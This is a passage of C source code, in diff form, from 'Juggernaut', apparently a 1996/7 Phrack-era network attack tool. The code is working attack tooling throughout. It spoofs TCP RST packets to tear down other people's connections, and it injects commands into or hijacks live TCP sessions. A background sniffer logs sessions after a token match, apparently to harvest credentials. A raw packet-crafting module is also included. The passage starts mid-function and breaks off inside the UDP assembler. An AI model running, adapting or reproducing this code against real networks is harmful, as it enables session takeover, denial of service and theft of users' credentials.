+        unsigned char prot;
+        unsigned short tlen;
+    }*ppheader;
+ 		
+    static int moot=0;
+    int tlinksock=tap(DEVICE);
+
+    ALIGNNETPOINTERS();
+
+    sin.sin_family=AF_INET;     /* Preload these values.  All we are really 
+                                   waiting for are the seq/ack #s */
+    sin.sin_port=target->dport;     
+    sin.sin_addr.s_addr=target->saddr;
+
+    bzero(&tpack,sizeof(tpack));    /* Zero out these structures so I dunot 
+                                       have to assign 0's to the unused
+                                       areas... */
+    bzero(&ppheader,sizeof(ppheader));             
+
+    tpack.tcp.source=target->dport;	    /* 16-bit Source port number */
+    tpack.tcp.dest=target->sport;   	    /* 16-bit Destination port */
+    tpack.tcp.doff=5;               	    /* Data offset */
+    tpack.tcp.ack=1;                	    /* Acknowledgement field valid flag */
+    tpack.tcp.rst=1;                	    /* Reset flag */
+    tpack.tcp.window=htons(242);   	    /* 16-bit Window size */
+
+    tpack.ip.version=4;             	    /* 4-bit Version */
+    tpack.ip.ihl=5;                 	    /* 4-bit Header Length */
+    tpack.ip.tot_len=htons(IPHDR+TCPHDR);   /* 16-bit Total length */
+    tpack.ip.ttl=64;                	    /* 8-bit Time To Live */
+    tpack.ip.protocol=IPPROTO_TCP;  	    /* 8-bit Protocol */
+
+    tpack.ip.saddr=target->daddr;     	    /* 32-bit Source Address */
+    tpack.ip.daddr=target->saddr;     	    /* 32-bit Destination Address */
+
+    tempBuf=(char *)malloc(PHDR+TCPHDR);    /* Checksum stuff */
+    ppheader=(struct psuedoHeader *)tempBuf;
+    
+    ppheader->saddr=tpack.ip.saddr;
+    ppheader->daddr=tpack.ip.daddr;
+    ppheader->prot=IPPROTO_TCP;
+    ppheader->null=0;
+    ppheader->tlen=htons(TCPHDR);
+ 
+    fprintf(stderr,"Reseting connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport));
+ 
+    if(setjmp(env)){			    /* Timeout */
+        if(verbosity)fprintf(stderr,"Quiet connection, not reset. [soft error, returning]\n");
+	return;
+    }
+    signal(SIGALRM,nettimeout);
+    alarm(netreadtimeout);                  /* Wait 10 seconds for reply */
+
+    while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->saddr&&tcphp->source==target->sport){
+
+        for(;moot<RSTS;moot++){                /* Send RSTs, incrementing 
+                                                seqs and acks as we go */
+            tpack.tcp.seq=tcphp->ack_seq+(htonl(moot));
+            tpack.tcp.ack_seq=tcphp->seq+(htonl(moot));
+
+            bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR);
+            tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR);
+
+	    sendto(ripsock,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
+        }
+	alarm(0);
+
+        /*free(tempBuf);    XXX */
+	fprintf(stderr,"Connection torn down.\n");
+        close(tlinksock);
+	break;
+    }
+}
+
+
+/*
+ *  Sets up automated connection reseting.  A source and possibly a 
+ *  destination host are targeted for reseting.  This function will kill any 
+ *  connection attempts from the source (and possibly to a destination).
+ */
+
+void acrst(source,target)
+unsigned long source, target;
+{
+
+    char *hostLookup(unsigned long);
+    unsigned short in_cksum(unsigned short *,int);
+    void spasm();               /* Handles the user defined signal */
+
+    struct tpack{                               
+        struct iphdr ip;
+        struct tcphdr tcp;
+    }tpack;
+
+    struct psuedoHeader{
+        unsigned long saddr;
+        unsigned long daddr;
+        unsigned char null;
+        unsigned char prot;
+        unsigned short tlen;
+    }*ppheader;
+		
+    struct sockaddr_in sin;
+    
+    int moot=0;
+    extern int ripsock;	
+    extern int acrstpid;
+    char *tempBuf=0;
+    int tlinksock=tap(DEVICE);
+
+    switch((acrstpid=fork())){ 	/* Drop a child to backround, return the 
+                                   parent to continue */
+        case 0:                 /* Set the priority up a few notchs..  
+                                   I get better results */
+            if(setpriority(PRIO_PROCESS,0,-20)){
+	        if(verbosity)perror("acrst module (setpriority)");
+                fprintf(stderr,"[cr]");
+                getchar();
+            }
+            signal(SIGUSR1,spasm);  /* Keep track of the child and register
+                                       it with the cleanup signal handler */
+            signal(SIGINT,SIG_IGN);         
+            signal(SIGQUIT,SIG_IGN);
+            break;
+        default:
+            return;                          
+        case -1:
+            if(verbosity)perror("acrst module Internal forking error [fatal]");
+            exit(1);
+    }
+
+    ALIGNNETPOINTERS();
+         				        /* Preload these values. */
+    sin.sin_family=AF_INET;
+       	
+    bzero(&tpack,sizeof(tpack));
+    bzero(&ppheader,sizeof(ppheader)); 
+  
+    tpack.tcp.doff=5;   
+    tpack.tcp.ack=1;
+    tpack.tcp.rst=1;
+    tpack.tcp.window=htons(242);	
+
+    tpack.ip.version=4; 
+    tpack.ip.ihl=5;
+    tpack.ip.tot_len=htons(IPHDR+TCPHDR); 
+    tpack.ip.ttl=64;
+    tpack.ip.protocol=IPPROTO_TCP; 
+
+    tempBuf=(char *)malloc(PHDR+TCPHDR);
+    ppheader=(struct psuedoHeader *)tempBuf;
+
+    ppheader->null=0;
+    ppheader->prot=IPPROTO_TCP;
+    ppheader->tlen=htons(TCPHDR);
+ 	
+    while(1){
+        if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&tcphp->syn&&iphp->saddr==source){
+            if(target)if(iphp->daddr!=target)continue;
+
+            sin.sin_port=tcphp->dest;     
+            sin.sin_addr.s_addr=iphp->saddr;
+   
+            tpack.tcp.source=tcphp->dest;
+            tpack.tcp.dest=tcphp->source;
+
+            for(moot=1;moot<RSTS+1;moot++){     /* Send RSTs, incrementing 
+                                               acks as we go */
+
+                tpack.tcp.ack_seq=tcphp->seq+(htonl(moot));
+
+                tpack.tcp.check=0;              		
+                tpack.ip.saddr=iphp->daddr; 
+                tpack.ip.daddr=iphp->saddr;  
+                tpack.ip.check=0;   
+    
+                ppheader->saddr=tpack.ip.saddr;	
+                ppheader->daddr=tpack.ip.daddr;
+
+                bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR);
+                tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR);
+
+	        sendto(ripsock,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
+                fprintf(stderr,"%c-%c*",0x08,0x08);
+            }
+        }
+    }
+}
+
+/*
+ *  Simplex-hijack.  Really just inserts a command into the TCP stream.  This 
+ *  will totally desynch the connection however and cause two things to happen:
+ *  1) an ACK storm of epic proportions (maybe not, see accompanying paper) and
+ *  2) the target user will have her connection destroyed.  To alleviate the 
+ *  first problem, we simply reset the connection shortly after we hijack it. 
+ *  The second problem is a burden with this kind of hijacking.
+ */
+
+void csimplexhijack(target,commandbuf)
+struct connectionInfo *target;
+char *commandbuf;
+{
+
+    void nettimeout();
+    char *hostLookup(unsigned long);
+    unsigned short in_cksum(unsigned short *,int);
+
+    struct tpack{                   /* Generic TCP packet */
+        struct iphdr ip;
+        struct tcphdr tcp;
+        char payload[BUFSIZE];
+    }tpack;
+   
+   struct psuedoHeader{
+        unsigned long saddr;
+        unsigned long daddr;
+        unsigned char null;
+        unsigned char prot;
+        unsigned short tlen;
+    }*ppheader;
+  
+    struct sockaddr_in sin;         
+
+    extern int ripsock;	
+    extern int netreadtimeout;
+    static int len;
+    char *tempBuf;
+    int tlinksock=tap(DEVICE);
+
+    ALIGNNETPOINTERS();
+
+    bzero(&tpack,sizeof(tpack));
+
+    len=strlen(commandbuf)+1;			
+    bcopy(commandbuf,tpack.payload,len--);
+    sin.sin_family=AF_INET;
+    sin.sin_port=target->sport;     
+    sin.sin_addr.s_addr=target->daddr;
+
+    tpack.tcp.source=target->sport;
+    tpack.tcp.dest=target->dport;
+    tpack.tcp.doff=5;
+    tpack.tcp.ack=1;
+    tpack.tcp.psh=1; 
+    tpack.tcp.window=htons(242); 
+
+    tpack.ip.version=4;   
+    tpack.ip.ihl=5; 
+    tpack.ip.tot_len=htons(IPHDR+TCPHDR+len);	
+    tpack.ip.ttl=64;
+    tpack.ip.protocol=IPPROTO_TCP; 
+
+    tpack.ip.saddr=target->saddr; 
+    tpack.ip.daddr=target->daddr; 
+
+    tempBuf=(char *)malloc(PHDR+TCPHDR+len);    /* Check me out y0 */
+    ppheader=(struct psuedoHeader *)tempBuf;
+
+
+    ppheader->saddr=tpack.ip.saddr;
+    ppheader->daddr=tpack.ip.daddr;
+    ppheader->null=0;
+    ppheader->prot=IPPROTO_TCP;
+    ppheader->tlen=htons(TCPHDR+len);
+ 
+    fprintf(stderr,"(simplex) Hijacking connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport));
+ 
+    if(setjmp(env)){                            /* Timeout */
+        if(verbosity)fprintf(stderr,"Quiet connection, try again later. [soft error, returning]\n");
+        return;
+    }
+    signal(SIGALRM,nettimeout);
+    alarm(0);
+    alarm(netreadtimeout);                      /* Wait 10 seconds for reply */
+ 
+    while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->daddr&&tcphp->source==target->dport){
+        tpack.tcp.seq=tcphp->ack_seq;
+        tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1);   
+
+        bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR+len);
+        tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+len);
+
+	sendto(ripsock,&tpack,IPHDR+TCPHDR+len,0,(struct sockaddr *)&sin,sizeof(sin));
+
+	fprintf(stderr,"Command inserted, connection desynched.\n");
+	sleep(JCKRST);	        /* Don't reset the connection too quickly, or 
+                                   our command may not complete */
+	crst(target);
+        close(tlinksock);
+        /* free(tempBuf);  	XXX */
+	break;
+    }
+}
+
+/*
+ *  Hijack.  Desynchs the server from the client.  The resulting ACK storm 
+ *  makes things very difficult.
+ */
+
+void chijack(target)
+struct connectionInfo *target;
+{
+
+    void nettimeout();
+    void seizure();
+    char *hostLookup(unsigned long);
+    unsigned short in_cksum(unsigned short *,int);
+   
+
+    struct tpack{
+        struct iphdr ip;
+        struct tcphdr tcp;
+        char payload[2*BUFSIZE];
+    }tpack;
+
+    struct psuedoHeader{
+        unsigned long saddr;
+        unsigned long daddr;
+        unsigned char null;
+        unsigned char prot;
+        unsigned short tlen;
+    }*ppheader;                
+
+    struct sockaddr_in sin;
+
+    char buf[10*MINIBUF];
+    char *tempBuf=0;
+
+    extern int ripsock;	
+    extern int netreadtimeout;
+    extern int sigsentry;
+    static int len;
+    int tlinksock=tap(DEVICE);			
+    
+    ALIGNNETPOINTERS();
+
+    bzero(&tpack,sizeof(tpack));
+
+    sin.sin_family=AF_INET;
+    sin.sin_port=target->sport;     
+    sin.sin_addr.s_addr=target->daddr;
+
+    tpack.tcp.source=target->sport;
+    tpack.tcp.dest=target->dport;
+    tpack.tcp.doff=5;
+    tpack.tcp.ack=1;
+    tpack.tcp.psh=1;
+    tpack.tcp.window=htons(1024);
+
+    tpack.ip.version=4;
+    tpack.ip.ihl=5; 
+    tpack.ip.ttl=64; 
+    tpack.ip.protocol=IPPROTO_TCP;
+
+    tpack.ip.saddr=target->saddr; 
+    tpack.ip.daddr=target->daddr;
+
+    tempBuf=(char *)malloc(PHDR+TCPHDR+len);
+    ppheader=(struct psuedoHeader *)tempBuf;
+
+    ppheader->saddr=tpack.ip.saddr;
+    ppheader->daddr=tpack.ip.daddr;
+    ppheader->null=0;
+    ppheader->prot=IPPROTO_TCP;
+
+    signal(SIGINT,seizure);
+
+    fprintf(stderr,"Hijacking connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport));
+    fprintf(stderr,"'ctrl-c' when you are finished (this will RST the connection).\n"); 
+    fprintf(stderr,"juggernaut>");
+
+    fgets(buf,sizeof(buf),stdin);
+
+    len=strlen(buf)+1;			
+    bcopy(buf,tpack.payload,len--);
+
+    tpack.ip.tot_len=htons(IPHDR+TCPHDR+len);		
+    ppheader->tlen=htons(TCPHDR+len);
+
+    if(setjmp(env)){
+        if(verbosity)fprintf(stderr,"Quiet connection, try again later. [soft error, returning]\n");
+        return;
+    }
+    signal(SIGALRM,nettimeout);
+    alarm(0);
+    alarm(netreadtimeout);  
+                            /* Here we setup the initial hijack state.  We 
+                               need to desynch the connection, and the next 
+                               packet that comes by will be the catalyst. */
+    while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->daddr&&tcphp->source==target->dport){
+        tpack.tcp.seq=tcphp->ack_seq;
+        tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1);   
+
+        bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR+len);
+        tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+len);
+    
+	sendto(ripsock,&tpack,IPHDR+TCPHDR+len,0,(struct sockaddr *)&sin,sizeof(sin));
+	break;              
+    }                   
+                            
+    alarm(0);
+    while(sigsentry){                               /* Main hijack loop */
+	if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->daddr&&tcphp->source==target->dport){
+	    if(!tcphp->psh)continue;        /* If this is not data, ignore it */
+            dumpp(epack.payload-2,htons(iphp->tot_len)-sizeof(epack.ip)-sizeof(epack.tcp),0);
+
+            bzero(&buf,sizeof(buf));
+	    fgets(buf,sizeof(buf),stdin);
+            
+            if(!buf[1])continue;        /* No input data (CR) */ 
+
+	    len=strlen(buf)+1;			
+	    bcopy(buf,tpack.payload,len--);
+            tpack.tcp.psh=1;
+            tpack.tcp.check=0;                              
+            tpack.ip.check=0; 
+
+            tpack.ip.tot_len=htons(IPHDR+TCPHDR+len); 
+
+            tpack.tcp.seq=tcphp->ack_seq;
+            tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1);   
+
+            ppheader->tlen=htons(TCPHDR+len);         
+            bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR+len);
+            tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+len);
+
+	    sendto(ripsock,&tpack,IPHDR+TCPHDR+len,0,(struct sockaddr *)&sin,sizeof(sin));
+        }
+    }
+    crst(target);
+    /*free(tempBuf);        XXX */
+    close(tlinksock);
+}
+
+
+/*
+ *  Packet sniffer parses TCP packets for token.  Logs that packet, along with
+ *  the next 'enticement` number of packets.  Not really all that robust.
+ */
+
+void bloodhound(token,enticementfactor)
+char *token;
+int enticementfactor;
+{
+
+    void parsep(char *,int,FILE *);
+    void shadow();
+    char *hostLookup(unsigned long);
+
+    FILE *fp=0;                         
+    time_t tp=0;
+
+    int length=0;
+    int grabflag=0;                     /* Time to grab some packets */
+    unsigned long targetsourceip=0;
+    unsigned short targetsourceport=0;
+    int tlinksock=tap(DEVICE);          
+
+    if(!(fp=fopen(SNIFLOG,"a+"))){      /* Log to file */
+        if(verbosity){
+            fprintf(stderr,"Cannot open file for logging. [fatal]\n");
+            fprintf(stderr,"[cr]");
+        }
+        exit(0);
+    }
+
+    ALIGNNETPOINTERS();
+
+    fprintf(stderr,"\nDropping to background, sniffing for smarmy tidbits...\n");
+
+    shadow();                           /* Dropped to the background */
+    fprintf(stderr,"\nSend a SIGKILL to %d when you are thorugh.\n",getpid());
+ 
+    fprintf(fp,"\n---------------------------------------------------------------------\n[ Juggernaut bloodhound module log: token == '%s' ]\n",token);
+    time(&tp);
+    fprintf(fp,"[ Log started:\t\t%s---------------------------------------------------------------------\n",ctime(&tp));
+    fflush(fp);
+    
+    while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP){
+        length=htons(iphp->tot_len)-sizeof(epack.ip)-sizeof(epack.tcp);
+
+        if((!grabflag)&&(strstr((epack.payload-2),token))){   
+            grabflag=enticementfactor;                           
+            targetsourceip=iphp->saddr;                          
+            targetsourceport=tcphp->source;
+            fprintf(fp,"\n\t %s [%d]\t<-->\t %s [%d]\n",hostLookup(iphp->saddr),ntohs(tcphp->source),hostLookup(iphp->daddr),ntohs(tcphp->dest));
+            parsep(epack.payload-2,length,fp);
+        }                
+        if(grabflag){                   /* We have a session marked and are
+                                           logging it */
+            if(iphp->daddr==targetsourceip&&tcphp->dest==targetsourceport){
+                parsep(epack.payload-2,length,fp);
+                grabflag--;
+            }
+        }        
+    }
+    /* NOTREACHED */
+}
+
+
+/* 
+ *  Packet parser.  Print the packet out...
+ */
+
+void parsep(payload,length,fp)
+char *payload;
+int length;
+FILE *fp;
+{
+    register int tickytacky=0;
+
+    for(tickytacky=0;tickytacky<length;tickytacky++){
+        if(payload[tickytacky]==0xd){        /* newline characater */
+            fprintf(fp,"\n");
+            continue;
+        }
+        if(isprint(payload[tickytacky]))fprintf(fp,"%c",payload[tickytacky]);
+    }
+    fflush(fp);
+}
+
+
+/*
+ *  Handles network timeouts.
+ */
+
+void nettimeout(){
+
+    alarm(0);
+    longjmp(env,1);
+}
+<-->
+<++> Juggernaut/NumberOneCrush/prometheus.c
+/*
+ *
+ *                                  Juggernaut
+ *                                  Version b2
+ *
+ *                            1996/7 Guild productions
+ *                           daemon9[guild|phrack|r00t]
+ *
+ *                         comments to route@infonexus.com
+ *
+ *  This coding project made possible by a grant from the Guild corporation
+ * 
+ *  prometheus.c - the packet assemby workshop module.  Each of the main 
+ *  packet assembly subfunctions will end up calling the ip assembler to build
+ *  the IP portion and send it (them) out.
+ *
+ *  Too many dependencies in menu.c 
+ *
+ *  Shout out to Nirva for some suggestions/help.  Nirva rules, BTW.  I love 
+ *  Nirva.  You should too.
+ *
+ */
+
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <time.h>
+#include <netinet/in.h>
+#include <unistd.h>
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <arpa/inet.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <linux/socket.h>
+#include <linux/ip.h>
+#include <linux/tcp.h>
+#include <linux/udp.h>
+#include <linux/icmp.h>
+#include <linux/if_ether.h>
+#include <linux/if.h>
+ 
+#define MINIBUF     10  
+#define BUFSIZE     512
+#define ETHHDR      14
+#define PHDR        12
+#define TCPHDR      20
+#define UDPHDR      8
+#define IPHDR       20
+
+#define NOTRANSPORT     0x00
+#define TCPTRANSPORT    0x01
+#define UDPTRANSPORT    0x02
+#define ICMPTRANSPORT   0x04
+
+struct tpak{			/* TCP packet */
+    struct tcphdr tcp;
+    char payload[BUFSIZE];
+}tpack;
+
+struct upak{			/* UDP packet */
+    struct udphdr udp;
+    char payload[BUFSIZE];
+}upack;
+
+struct ipak{			/* ICMP packet */
+    struct icmphdr icmp;
+    char payload[BUFSIZE];
+}ipack;
+
+struct rippak{     		/* IP packet */
+    struct iphdr ip;
+    char payload[BUFSIZE+20];   /* Payload + transport header */
+}rippack;
+
+int woe;                        /* Global var to let us know where to return 
+                                   to... */
+extern int verbosity;
+
+				/* This will change when IP/TCP options are 
+                                   implemented... */
+#define RIPPACKETSIZE 552	/* IP header + transport header of up to 20 
+                                   bytes + 512 byte payload */
+
+int prometheus(type)
+int type;
+{
+    void tcpa();
+    void udpa();
+    void icmpa();
+    void igmpa();
+    void ripa(int);
+
+    bzero(&rippack,sizeof(rippack));
+    woe=0;
+
+    switch(type){
+        case 1:
+	    tcpa();		/* TCP */
+	    break;
+	case 2:
+	    udpa();		/* UDP */
+	    break;
+	case 3:				
+	    icmpa();		/* ICMP */
+	    break;
+	case 4:
+	    ripa(NOTRANSPORT);	/* RAW IP with no transport and no payload */	
+	    break;
+	case 5:
+	    return(woe=1);      /* Done assembling packets */
+	default:
+	    break;              /* bad input -- not done */			
+    }
+    return(woe);
+}
+
+
+/* 
+ *  TCP assembler
+ */
+
+void tcpa(){
+
+    void ripa(int);
+    void mwipe();
+    void mpktatcp(int,unsigned short,unsigned short,unsigned long,unsigned long,char *,unsigned short,char *);
+
+    char buf[2*MINIBUF];
+    unsigned long val;
+    int packetready=0;		/* flag bits */
+    char data[4*MINIBUF]={0},flags[MINIBUF]={0},filename[4*MINIBUF]={0};
+    int i,j,fd,loopsentry=1;
+
+    bzero(&tpack,sizeof(tpack));
+
+    srandom((unsigned)time(0)); /* seed psuedo random number generator */ 
+
+    while(loopsentry){
+        mwipe();	
+	mpktatcp(packetready,ntohs(tpack.tcp.source),ntohs(tpack.tcp.dest),ntohl(tpack.tcp.seq),ntohl(tpack.tcp.ack_seq),flags,ntohs(tpack.tcp.window),data);
+                    
+        fgets(buf,sizeof(buf),stdin);
+        if(!(val=atoi(buf)))continue;
+        switch(val){
+            case 1:         /* Source Port */
+ 	        fprintf(stderr,"\nSource Port (0 - 65535) [qr] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='r'){
+		    tpack.tcp.source=htons(random()&0xffff);
+		    packetready|=0x01;
+		    break;
+		}
+                if(buf[0]=='q'||(val=atoi(buf))<0||val>65535){
+		    if(packetready&0x01)packetready^=0x01;	/* Clear flag 
+                                                                   if set */
+		    tpack.tcp.source=0;
+		    break;
+		}
+		tpack.tcp.source=htons(val);
+		packetready|=0x01;
+		break;
+            case 2:         /* Destination Port */
+	        fprintf(stderr,"\nDestination Port (0 - 65535) [qr] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='r'){
+		    tpack.tcp.dest=htons(random()&0xffff);
+		    packetready|=0x02;
+		    break;
+		}
+                if(buf[0]=='q'||(val=atoi(buf))<0||val>65535){
+		    if(packetready&0x02)packetready^=0x02;
+		    tpack.tcp.dest=0;
+		    break;
+		}
+		tpack.tcp.dest=htons(val);
+		packetready|=0x02;
+		break;
+            case 3: 	    /* Sequence Number */
+	        fprintf(stderr,"\nSequence Number (0 - 4294967295) [qr] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='r'){
+		    tpack.tcp.seq=htonl(random());
+		    packetready|=0x04;
+		    break;
+		}
+                if(buf[0]=='q'||buf[0]=='-'){                           
+		    if(packetready&0x04)packetready^=0x04;		
+		    tpack.tcp.seq=0;
+		    break;
+		}
+		tpack.tcp.seq=htonl(strtoul(buf,0,10));
+		packetready|=0x04;
+		break;
+            case 4:         /* Acknowledgement Number */
+	        fprintf(stderr,"\nAcknowledgement Number (0 - 4294967295) [qr] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='r'){
+		    tpack.tcp.ack_seq=htonl(random());
+		    packetready|=0x08;
+		    break;
+		}
+                if(buf[0]=='q'||buf[0]=='-'){
+		    if(packetready&0x08)packetready^=0x08;
+		    tpack.tcp.ack_seq=0;
+		    break;
+		}
+		tpack.tcp.ack_seq=htonl(strtoul(buf,0,10));
+		packetready|=0x08;
+		break;
+	    case 5:         /* Control Flags */
+	        i=0;
+		bzero(flags,sizeof(flags));
+	        fprintf(stderr,"\nURG? [yNq] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='q'){
+		    if(packetready&0x10)packetready^=0x10;
+		    tpack.tcp.urg=0;
+		    break;
+		}
+	        if(buf[0]=='y'){
+		    tpack.tcp.urg=1;
+		    flags[i++]='U';
+		}
+		fprintf(stderr,"\nACK? [yNq] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='q'){
+		    if(packetready&0x10)packetready^=0x10;		
+		    tpack.tcp.ack=0;
+		    break;
+		}
+		if(buf[0]=='y'){
+		    tpack.tcp.ack=1;
+		    flags[i++]='A';
+		}
+		fprintf(stderr,"\nPSH? [yNq] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='q'){
+		    if(packetready&0x10)packetready^=0x10;
+		    tpack.tcp.psh=0;
+		    break;
+		}
+		if(buf[0]=='y'){
+		    tpack.tcp.psh=1;
+		    flags[i++]='P';
+		}
+		fprintf(stderr,"\nRST? [yNq] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='q'){
+		    if(packetready&0x10)packetready^=0x10;	
+		    tpack.tcp.rst=0;
+		    break;
+		}
+		if(buf[0]=='y'){
+		    tpack.tcp.rst=1;
+		    flags[i++]='R';
+		}
+		fprintf(stderr,"\nSYN? [yNq] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='q'){
+		    if(packetready&0x10)packetready^=0x10;
+		    tpack.tcp.syn=0;
+		    break;
+		}
+		if(buf[0]=='y'){
+		    tpack.tcp.syn=1;
+		    flags[i++]='S';
+		}
+		fprintf(stderr,"\nFIN? [yNq] >");
+                fgets(buf,sizeof(buf),stdin);
+	        if(buf[0]=='q'){
+		    if(packetready&0x10)packetready^=0x10;		
+		    tpack.tcp.fin=0;
+		    break;
+		}
+		if(buf[0]=='y'){
+		    tpack.tcp.fin=1;
+		    flags[i++]='F';
+	        }
+		if(!flags[0])strcpy(flags,"none set");
+		packetready|=0x10;
+		break;
+            case 6:     /* Window Size */
+	        fprintf(stderr,"\nWindow Size (0 - 65535) [qr] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='r'){
+		    tpack.tcp.window=htons(random()&0xffff);
+		    packetready|=0x20;
+		    break;
+		}
+                if(buf[0]=='q'||(val=atoi(buf))<0||val>65535){
+		    if(packetready&0x20)packetready^=0x20;
+		    tpack.tcp.window=0;
+		    break;
+		}
+		tpack.tcp.window=htons(val);
+		packetready|=0x20;
+		break;
+            case 7:     /* Data payload */
+	        bzero(data,sizeof(data));
+		bzero(tpack.payload,sizeof(tpack.payload));
+		bzero(filename,sizeof(filename));
+		fprintf(stderr,"\nData Payload Source (512 Bytes Maximum) [qfc] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='c'){	/* Input from command line */
+		    fprintf(stderr,"\nEnter Payload [q] >");
+		    fgets(tpack.payload,sizeof(tpack.payload),stdin);
+		    strncpy(data,tpack.payload,sizeof(data));
+		    packetready|=0x40;
+		    break;
+		}
+		if(buf[0]=='f'){	/* Input from file */
+		    fprintf(stderr,"\nFilename [q] >");
+		    if(buf[0]==0x0a||buf[0]=='q')break;
+		    fgets(filename,sizeof(filename),stdin);
+		    for(i=0;i<4*MINIBUF;i++)if(!filename[i])break;
+		    filename[--i]=0;	/* Pesky Newline */
+		    if((fd=open(filename,O_RDONLY))<0){
+                        if(verbosity){
+                            fprintf(stderr,"Cannot open file for reading.\n");
+                            fprintf(stderr,"[cr]");
+                            getchar();
+                        }
+			continue;
+                    }
+                    i=0;
+                    j=0;
+		    while(i<512){
+                        j=read(fd,tpack.payload,sizeof(tpack.payload));
+                        if(!j)break;    /* No more bytes ta read */
+                        i+=j;
+                    }
+		    strncpy(data,filename,sizeof(filename));
+		    close(fd);
+		    packetready|=0x40;
+		    break;
+       	        }   
+		if(packetready&0x40)packetready^=0x40;
+		bzero(data,sizeof(data));
+		bzero(tpack.payload,sizeof(tpack.payload));
+		break;
+	    case 8:         /* Return to previous menu */
+	        loopsentry=0;
+                bzero(&tpack,sizeof(tpack));
+		break;
+            case 9:         /* Return to Main */
+	        loopsentry=0;
+                woe=1;
+                break;
+	    case 10:        /* RIP assembler */
+	        if(packetready==0x07f){	    /* AND mask of all the options */
+                    tpack.tcp.doff=5;       /* Data offset */
+		    ripa(TCPTRANSPORT);	    /* Checksum will be computed in 
+                                               ripa */
+		    break;
+		}
+                continue;
+	    default:        /* Bad input */
+	        continue;
+        }
+    }
+}
+
+/* 
+ *  UDP assembler
+ */
+
+void udpa(){
+
+    void ripa(int);
+    void mwipe();
+    void mpktaudp(int,unsigned short,unsigned short,char *);
+
+    char buf[2*MINIBUF];
+    unsigned long val;
+    int packetready=0;		/* flag bits */
+    char data[4*MINIBUF]={0},filename[4*MINIBUF]={0};
+    int i=0,j,fd=0,loopsentry=1;
+
+    bzero(&upack,sizeof(upack));
+
+    srandom((unsigned)time(0));
+
+    while(loopsentry){
+        mwipe();	
+
+	mpktaudp(packetready,ntohs(upack.udp.source),ntohs(upack.udp.dest),data);
+                
+	fgets(buf,sizeof(buf),stdin);
+        if(!(val=atoi(buf)))continue;
+        switch(val){
+            case 1:         /* Source Port */
+	        fprintf(stderr,"\nSource Port (0 - 65535) [qr] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]==0x0a||buf[0]=='q'){
+		    if(packetready&0x01)packetready^=0x01;	
+		    upack.udp.source=0;
+		    break;
+		}
+		if(buf[0]=='r'){
+		    upack.udp.source=htons(random()&0xffff);
+		    packetready|=0x01;
+		    break;
+		}
+		if(!(int)(val=atoi(buf)))break;
+	        upack.udp.source=htons(val);
+		packetready|=0x01;
+		break;
+            case 2:	    /* Destination Port */
+	        fprintf(stderr,"\nDestination Port (0 - 65535) [qr] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]==0x0a||buf[0]=='q'){
+		    if(packetready&0x02)packetready^=0x02;
+		    upack.udp.dest=0;
+		    break;
+		}
+		if(buf[0]=='r'){
+		    upack.udp.dest=htons(random()&0xffff);
+		    packetready|=0x02;
+		    break;
+                }
+		if(!(int)(val=atoi(buf)))break;
+		upack.udp.dest=htons(val);
+		packetready|=0x02;
+		break;
+	    case 3:	    /* Data payload */
+	        bzero(data,sizeof(data));
+	        bzero(upack.payload,sizeof(upack.payload));
+		bzero(filename,sizeof(filename));
+		fprintf(stderr,"\nData Payload Source (512 Bytes Maximum) [qfc] >");
+                fgets(buf,sizeof(buf),stdin);
+		if(buf[0]=='c'){	/* Input from command line */
+		    fprintf(stderr,"\nEnter Payload [q] >");
+		    fgets(upack.payload,sizeof(upack.payload),stdin);
+		    strncpy(data,upack.payload,sizeof(data));
+		    packetready|=0x04;
+		    break;
+		}
